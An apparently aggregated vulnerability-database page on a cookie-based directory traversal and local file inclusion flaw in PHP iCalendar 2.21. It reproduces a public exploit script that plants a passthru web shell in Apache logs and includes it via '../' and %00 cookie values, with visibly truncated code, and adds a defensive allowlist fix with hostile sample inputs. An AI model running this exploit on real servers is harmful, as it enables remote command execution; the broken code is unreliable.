Published: 2006-03-19 18:02:00
Last revised: 2011-03-07 21:32:43

[Original] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.

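[CNNVD] php iCalendar local file inclusion vulnerability (CNNVD-200603-315)

        A directory traversal vulnerability exists in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier. Remote attackers can include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into the Apache access_log file, which is then included by day.php.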

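- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]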

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(UNKNOWN)  VUPEN  ADV-2006-1019
(UNKNOWN)  BID  17125

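- Vulnerability information

php iCalendar local file inclusion vulnerability
Medium severity  Path traversal
2006-03-19 00:00:00 2006-03-20 00:00:00
        A directory traversal vulnerability exists in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier. Remote attackers can include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into the Apache access_log file, which is then included by day.php.

- Advisories and patches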


- Vulnerability information (1585)

php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit (EDBID:1585)
php webapps
2006-03-15 Verified
0 rgod
N/A
#!/usr/bin/php -q -d short_open_tag=on
echo "php iCalendar <=2.21 \"cookie_language\"/\"cookie_style\" remote cmmnds xctn\r\n";
echo "-> arbitrary local inclusion through cookies\r\n";
echo "by rgod rgod<AT>autistici<DOT>org\r\n";
echo "site:\r\n\r\n";

# short explanation: phpICal stores language & template user preferences inside
# cookies. These values are used to include files, but there is no check for
# "../" chars... also you can break path through a null char (%00) regardless of any
# magic_quotes_gpc settings, because they are serialized & we have a stripslashes
# on them. This code injects a shell in Apache log files, then tries to include
# it through phpicalendar[cookie_language] & phpicalendar[cookie_style] cookies

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to phpICal\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /phpical/ ls -la\r\n";


function quick_dump($string)
  for ($i=0; $i<=strlen($string)-1; $i++)
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 return $exa."\r\n".$result;
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    if (!$ock) {
      echo 'No response from proxy...';die;
  if ($proxy=='') {
    while (!feof($ock)) {
  else {
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  #echo "\r\n".$html;


for ($i=3; $i<=$argc-1; $i++){
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
if ($temp=="-P")
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "[1] Injecting some code in log files...\r\n";
$CODE ='<?php ob_clean();echo 666;if (get_magic_quotes_gpc()) {$_GET[cmd]=striplashes($_GET[cmd]);}';
$CODE.='passthru($_GET[cmd]);echo 666;die;?>';
$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
$packet.="User-Agent: ".$CODE."\r\n";
$packet.="Host: ".$serv."\r\n";
$packet.="Connection: close\r\n\r\n";
#echo quick_dump($packet);

# fill with possible locations
$paths= array (

for ($i=0; $i<=count($paths)-1; $i++)
  echo "[".$j."] Trying with ".$paths[$i]."%00\r\n";
  $packet ="GET ".$p."day.php?cmd=".$cmd." HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Cookie: phpicalendar=".$xpl."; PHPSESSID=;\r\n";
  $packet.="Connection: Close\r\n\r\n";
  #debug, shows packets in a nice format
  #echo quick_dump($packet);
  if (strstr($html,"666")){
    echo "Exploit succeeded...\r\n";
    echo $temp[1];
#if you are here...
echo "Exploit failed...";

# [2006-03-15]

- Vulnerability information

PHP iCalendar Cookie Values Traversal Local File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-03-15 Unknown
2006-03-15 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

php iCalendar Local File Include Vulnerability
Input Validation Error 17125
Yes No
2006-03-15 12:00:00 2009-02-09 05:58:00
rgod is credited with the discovery of this vulnerability.

- Affected software versions

PHP iCalendar PHP iCalendar 2.2.1
PHP iCalendar PHP iCalendar 2.0.1
PHP iCalendar PHP iCalendar 2.0 c
PHP iCalendar PHP iCalendar 2.0 b
PHP iCalendar PHP iCalendar 2.0 a2
PHP iCalendar PHP iCalendar 2.24
PHP iCalendar PHP iCalendar 2.23 rc1
PHP iCalendar PHP iCalendar 2.22
PHP iCalendar PHP iCalendar 2.22
PHP iCalendar PHP iCalendar 2.1
PHP iCalendar PHP iCalendar 2.0

- Discussion

PHP iCalendar is prone to a local file-include vulnerability. This may facilitate the unauthorized viewing of files and unauthorized execution of local scripts.

PHP iCalendar 2.21 and prior versions are vulnerable; other versions may be affected as well.
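
The root cause described on this page is that cookie-supplied language and style names reach a file include without validation. The following hardening sketch is an added example, not PHP iCalendar's code or a vendor patch: the function name, the languages/<name>.inc.php and templates/<name>/ layout, and the sample values are assumptions constructed for illustration.

```php
<?php
// Added example: allowlist check for cookie-supplied language/style names.
// Layout (languages/<name>.inc.php, templates/<name>/) is an assumption.

function pick_preference($requested, string $baseDir, string $suffix, string $default): string
{
    // Strict syntax first: no NUL bytes, dots or path separators can pass.
    if (!is_string($requested) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return $default;
    }
    // Then an allowlist built from what actually exists on disk.
    $allowed = [];
    foreach (scandir($baseDir) ?: [] as $entry) {
        if ($suffix === '') {                       // directories (templates)
            if ($entry[0] !== '.' && is_dir("$baseDir/$entry")) {
                $allowed[] = $entry;
            }
        } elseif (substr($entry, -strlen($suffix)) === $suffix) {   // files
            $allowed[] = substr($entry, 0, -strlen($suffix));
        }
    }
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Constructed fixture standing in for an application directory.
$root = sys_get_temp_dir() . '/ical_demo_' . getmypid();
mkdir("$root/languages", 0700, true);
mkdir("$root/templates/default", 0700, true);
touch("$root/languages/english.inc.php");
touch("$root/languages/french.inc.php");

// Constructed cookie values: one legitimate, two hostile shapes.
$samples = [
    'french',
    "../../logs/access_log\0",
    ['nested' => 'array'],
];
foreach ($samples as $value) {
    $lang  = pick_preference($value, "$root/languages", '.inc.php', 'english');
    $style = pick_preference($value, "$root/templates", '', 'default');
    echo json_encode($value), " => language=$lang style=$style\n";
}
```

Only the first sample selects a non-default language; the traversal string with the NUL byte and the non-string value both fall back to the defaults before any path is built.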

- Exploit

Example exploit code has been supplied:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at:

- Related references